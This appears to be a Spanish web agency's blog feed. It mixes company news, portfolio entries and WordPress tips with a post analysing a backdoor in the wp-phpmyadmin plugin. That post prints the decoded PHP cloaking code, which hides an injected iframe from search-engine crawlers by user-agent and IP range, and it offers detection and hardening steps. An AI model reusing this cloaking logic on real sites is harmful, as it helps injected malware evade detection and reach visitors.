onestic » admin

IFashion, proyecto de innovación de publicidad online inteligente que recomienda productos similares

admin — Thu, 26 Jan 2012 17:41:20 +0000

IFashion es un proyecto en el que Onestic está trabajando en estrecha colaboración con el Instituto Tecnológico AIDO, y presenta una innovación importante en el campo de la publicidad en Internet y en medios audiovisuales por su aplicación como recomendador inteligente de productos mediante procesado de imágenes.

En concreto, el proyecto IFashion permitirá la selección e interacción de imágenes o videos al cualquier usuario de Internet, con el objetivo de obtener información, participar en acciones, y tener la posibilidad de comprar productos que esté visualizando en ese momento en el elemento audiovisual.

Este nuevo sistema permitirá realizar el tracking de productos y objetos, con el ambicioso objetivo de conseguir un algoritmo de recomendación de artículos que favorezca el proceso de compra online, aumente la conversión y los ratios de compra, y la satisfacción general del cliente gracias a la sencillez y comodidad en el proceso.

Como innovación a añadir al abanico de recursos en publicidad online, este sistema tendrá la posibilidad de abrir una nueva vía para potenciar el comercio electrónico en España, especialmente en el caso de marcas fabricantes de moda: Complementar la presencia online de las marcas, reforzar acciones de branding, permitir al cliente comprar un producto que esté visualizando en video o imagen en cualquier tipo de plataforma ecommerce son sólo algunas de las posibles aplicaciones que tendrá el proyecto IFashion.

Una de las múltiples integraciones que esta tecnología puede tener lugar lo vemos en sites y comunidades de moda online del estilo de Chicisimo.com (donde las usuarias publican fotos de cómo van vestidas y comparten sus gustos), mediante la integración de la venta de productos en los looks gracias al reconocimiento inteligente de prendas y complementos.

Este tipo de aplicación de la plataforma IFashion no sólo tendrá un uso directo en comercio electrónico, proporcionando un canal orgánico de “social shopping” al convertir a las usuarias en prescriptoras directas de las marcas, si no que presentará múltiples variantes en lo relativo a la explotación de datos que situarán a IFashion como una plataforma altamente atractiva para las marcas.

Más allá del sector de la moda, la plataforma IFashion tiene aplicaciones en otros sectores como el de la electrónica, la alimentación, bricolaje, mobiliario, etc.

En los próximos meses estará disponible una versión beta para plataformas de comercio electrónico de esta tecnología. Estará especialmente indicado para tiendas online con un extenso catálogo, que quieran disponer de un recomendador avanzado de productos para sus clientes. La adaptación e integración se personalizará en cada proyecto estudiando sus características, la clasificación de productos y los atributos que los definen, así como el comportamiento de los usuarios como cross-selling y para conseguir un resultado lejos del alcance de otras herramientas disponibles actualmente en el mercado.

Este proyecto ha sido financiado por el Instituto de la Pequeña y Mediana Industria de la Generalitat Valenciana (IMPIVA) y por el Fondo Europeo de Desarrollo Regional de la Unión Europea (FEDER).

Puerta trasera en el plugin de wp-phpmyadmin

admin — Mon, 22 Aug 2011 10:22:23 +0000

En los últimos meses hemos sido testigos de un ataque similar sobre algunos blogs a los que tenemos acceso. WordPress hackeado, con un iframe al comienzo de las páginas y que los buscadores no detectaban como página peligrosa. Sólo algunos antivirus de los usuarios se daban cuenta del ataque. Y el culpable (o donde residía la backdoor) era el plugin de wp-phpmyadmin.

El plugin de wp-phpmyadmin tiene una utilidad importante cuando no tienes acceso de otro modo a la base de datos de tu instalación de WordPress. Pero el precio que se puede pagar por usarlo, después de haber comprobado la vulnerabilidad que trae consigo, es bastante alto.

El plugin no se actualiza desde el 2007 (con wp 1.5), no se puede encontrar en el repositorio oficial de plugins de WordPress (http://wordpress.org/extend/plugins/), y lo más importante: se había conseguido introducir un fichero dentre el resto de ficheros del plugin que abría una puerta trasera a nuestro sistema.

Pero vamos por partes y a explicar cómo funciona este hack de WordPress con detalle:

El ataque consistía en introducir en los ficheros index.php una línea justo detrás del primer



Este código codificado, daba el siguiente fragmento de php tras decodificarlo, fragmento que acababa pintando un iframe antes de la etiqueta ? en los blog al pasarlo por la función eval():



error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
 array("216.239.32.0","216.239.63.255"),
 array("64.68.80.0"  ,"64.68.87.255"  ),
 array("66.102.0.0",  "66.102.15.255"),
 array("64.233.160.0","64.233.191.255"),
 array("66.249.64.0", "66.249.95.255"),
 array("72.14.192.0", "72.14.255.255"),
 array("209.85.128.0","209.85.255.255"),
 array("198.108.100.192","198.108.100.207"),
 array("173.194.0.0","173.194.255.255"),
 array("216.33.229.144","216.33.229.151"),
 array("216.33.229.160","216.33.229.167"),
 array("209.185.108.128","209.185.108.255"),
 array("216.109.75.80","216.109.75.95"),
 array("64.68.88.0","64.68.95.255"),
 array("64.68.64.64","64.68.64.127"),
 array("64.41.221.192","64.41.221.207"),
 array("74.125.0.0","74.125.255.255"),
 array("65.52.0.0","65.55.255.255"),
 array("74.6.0.0","74.6.255.255"),
 array("67.195.0.0","67.195.255.255"),
 array("72.30.0.0","72.30.255.255"),
 array("38.0.0.0","38.255.255.255")
 );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
 if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '';
}


Este iframe se intentaba ocultar a los robots de los buscadores y de rastreadores importantes para evitar que saltasen las alarmas de estos, y pusiesen en aviso al dueño del blog mediante alarmas al correo electrónico, bloqueos de su página desde la página de resultados de búsqueda, etc. Así podía permanecer el mayor tiempo posible estando oculto.



El contenido del iframe cargaba una direccion de un servidor (todos los distintos dominios que hemos podido comprobar estaban en Rumanía), donde se podía pintar cualquier cosa, seguramente troyanos javascript que comprometiesen la seguridad del usuario que visitase la web.





Cómo saber si tengo esta puerta trasera en mi sistema, y como solucionarlo (detección, solución y prevención):



- Comprobar si tenemos el plugin de wp-phpmyadmin, y buscar el fichero phpmyadmin/upgrade.php dentro del mismo. Renombrar la extensión o eliminar este fichero, sobre todo si tiene dentro unas instrucciones parecida a estas:






- Buscar en el resto de ficheros de wp-content la cadena ‘eval(stripslashes‘ (por ejemplo), y comprobar en los resultados si alguno se parece a la línea anterior.



- Mantener una política estricta de permisos sobre los ficheros de la instalación de WordPress. Si los ficheros index.php hubiesen estado correctamente configurados en cuanto a permisos, tal y como aconsejan en http://codex.wordpress.org/Hardening_WordPress la infección se hubiese podido evitar.



- Por supuesto, mantener nuestros plugins actualizados, junto con la última versión de WordPress siempre instalada. Y si alguno de los plugins deja de tener soporte o no se continúa su desarrollo, mejor optar por descartarlo y comenzar a buscar un sustituto del mismo.



Más info:



http://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html



http://www.wpsecuritylock.com/wp-phpmyadmin-plugin-hacked-backdoor-vulnerability/



Especial cuidado también con los plugins wptouch, addthis y w3-total-cache:


http://wpmu.org/wordpress-security-exploit-found-upgrade-wptouch-addthis-and-w3-total-cache/

Se buscan programadores PHP+MySQL, con conocimientos de Magento y/o WordPress.

admin — Mon, 06 Sep 2010 14:21:02 +0000

Estamos buscando para incorporar a nuestra plantilla varios perfiles de programadores, estos son los requisitos que buscamos si encajas, mándanos tu CV a info@onestic.com junto con tu portfolio de trabajos realizados.

Experimentado en PHP5/MySQL, acostumbrado a trabajar con SVN
Indispensable buen nivel de Magento y/o WordPress
Perfil de un finalizador/rematador comprometido con los tiempos de entrega.

Observa Producciones

admin — Tue, 16 Mar 2010 17:17:21 +0000

Web corporativa para la empresa valenciana Observa Producciones, dedicada a trabajos audiovisuales para particulares y empresas. En la web se muestran videos de canales de Youtube y Vimeo, galerías de fotos, integración con Twitter, Facebook, etc. Proyecto realizado con WordPress.

WordPress, imagen no encontrada, error 404 y el bucle infinito

admin — Mon, 25 Jan 2010 15:52:45 +0000

La personalización de las páginas de error en WordPress es cómoda y sencilla. La página de error más socorrida en las plantillas de WordPress es la del error 404 o “not found”. Esta página se muestra cuando se ha intentado acceder a una url para la que no existe contenido. Los más astutos aprovechan esta página para ofrecer al usuario enlaces a contenido relacionado con el que ha intentado encontrar para evitar que el usuario abandone la web. Otros simplemente muestran un texto indicando que no se ha encontrado el contenido buscado, dentro de una página que mantiene el estilo del resto de la web. Pero pensemos que este error se dará para cualquier url errónea en el navegador, tanto si es una página como si es una imágen o un documento. Ahora pensemos que alguna de las imágenes de nuestro tema no se referencia bien desde la plantilla de WordPress o simplemente no exista en el servidor, dando un error 404. Siempre que se muestre alguna página de nuestra plantilla que tenga esta imagen, se generará un error 404 y se renderizará en el servidor la página de error 404 de WordPress. Esto hace que aumente nuestra carga de servidor innecesariamente y también el tiempo de carga de la página, ya que en lugar de mandarse un mensaje escueto desde el servidor con el error 404 para la petición de esta imagen, se está mandando una página entera con todos los estilos. Esto se puede ver más claro con firebug: Sólo por minimizar la carga del servidor ya merece la pena hacer algo a este respecto, pero ahora imaginemos otro escenario en el que esta imagen que falta está referenciada en el footer, el sidebar o el header, y siempre que pidamos una página de wordpress se hará una petición a esta imagen inexistente (incluida la de 404). Entonces nos podemos encontrar con un bucle infinito: Se accede a una página: Se pide la imagen-> 404: Se vuelve a pedir la imagen -> 404: Se vuelve a pedir la imagen… Y así hasta que se sature el servidor web si ninguna opción de seguridad lo evita antes. Para solucionar este problema tan sólo debemos añadir un par de líneas a nuestro fichero .htaccess Redordad que las directrices del .htaccess se procesan en orden, por lo que conviene ponerla antes de las demás Rewrite Rules. Con estas líneas indicaremos que si se encuentra ante una petición http a una imagen que no exista, devuelva en su lugar cualquier otro elemento que nosotros le indiquemos y que sí esté disponible. Podemos indicar más tipos de fichero si lo consideramos oportuno: [CODE]RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_URI} \.(gif|jpg|jpeg|png|bmp)$ RewriteRule .* wp-content/themes/mi_tema/404.html [L][/CODE] Entre las diferentes opciones que tenemos a nuestra disposición, podemos devolver una imagen de 1×1 píxeles, aumentando la velocidad de carga de la página, o podemos incluir una imagen por defecto con el logo de la página (con cuidado, porque esta opción puede descuadrarnos el tema). También podemos devolver una página de error más básica que la de la plantilla, y en html estático. A pesar de que nos hemos puesto en el peor caso, esto no es lo habitual. Este tipo de errores de imágenes no encontradas se observa con más frecuencia en la redacción de posts que en la implementación del tema. Pero una migración de servidor, una limpieza de los ficheros subidos a WordPress o un cambio de directorio pueden ocasionar que estos errores aparezcan de la noche a la mañana.

Nuevo diseño en and.roid.es

admin — Mon, 04 Jan 2010 12:12:09 +0000

Año nuevo, tema nuevo para wordpress que hemos hecho para nuestros amigos de and.roid.es. Se trata de un rediseño completo de la web de and.roid.es manteniendo la naturaleza de la navegación entre post (artículos anteriores y posteriores en portada y en el detalle de cada uno), buscando ofrecer una imagen más profesional y un estilo más elegante. Junto con la gente de and.roid.es, y a partir su esquema inicial y de sus preferencias, nuestro diseñador David imaginó este template para wordpress al que le hemos incluido elementos del tema anterior para completar su funcionalidad y usabilidad. Hemos intentado dar más importancia a la versión más social de and.roid.es y a su comunidad con la inclusión del último tweet, mostrando el número de lectores del feed y el número de followers de @androides y los links sociales en la cabecera. Para el recuento de seguidores y followers usamos directamente la api de Feedburner y la de Twitter, y guardamos los datos durante un tiempo para acelerar la carga de la página aprovechando la caché de wordpress y minimizando a su vez los accesos a estas fuentes externas de información. También se aprovecha el uso de plugins de compresión de css y javascript, que ya estaban siendo usado en el blog. Incluimos en la home un pequeño slideshow para añadir dinamismo y darle vistosidad a la web. Ahora mismo (Enero 2010) está activa una encuesta donde puedes votar qué te parece el nuevo diseño de and.roid.es, incluso si no conoces el diseño anterior. ¡De momento gusta, y mucho!

Limpiomicasita

admin — Mon, 05 Oct 2009 15:08:08 +0000

Proyecto donde se han cuidado al máximo los detalles gráficos. Todos los elementos han sido diseñados de forma exclusiva. El ratón, los escenarios, los iconos, etc. Se trata de un proyecto donde se pueden ver Recetas de cocina, trucos de limpieza, etc. Página completamente administrable y optimizada.

Quartmetratges. Festival de cortometrajes

admin — Wed, 30 Sep 2009 10:04:42 +0000

Website desarrollo para el festival de cortos de Quart de Poblet, en fase de carga de contenidos y vídeos. Se desarrolla un aplicativo que convierte y publica de forma automática los vídeos subidos por los concursantes del festival. Integración con Facebook y twitter, blipTV, canal de youtube, etc.

Sadival. Tienda on-line Dialva

admin — Mon, 28 Sep 2009 11:08:06 +0000

Desarrollo de nueva tienda para el Grupo Dialva, Sadival. Tienda dedicada a la venta de Lotes de Navidad OnLine. Con este proyecto se pretende ser líder en el sector de las ventas On-line. Supervisión realizada por Juan Luis Hortelano de www.kanben.com.

Asilla. Portal de asociaciones

admin — Fri, 25 Sep 2009 10:05:11 +0000

Implantando para el Ajuntament de Silla el producto desarrollado por Onestic miAsociaciónenRed que permite crear de forma rápida, sencilla y eficaz websites para cada asociación del municipio. Así mismo, existe una meta-portal que aglutina toda la información generada por las asociaciones del municipio y una red social donde pueden participar todos los usuarios registrados en las asociaciones. Otras entidades vinculadas con el proyecto y donde se implantará la presente solución son el Ajuntament de Quart de Poblet y el Ajuntament de Burjassot.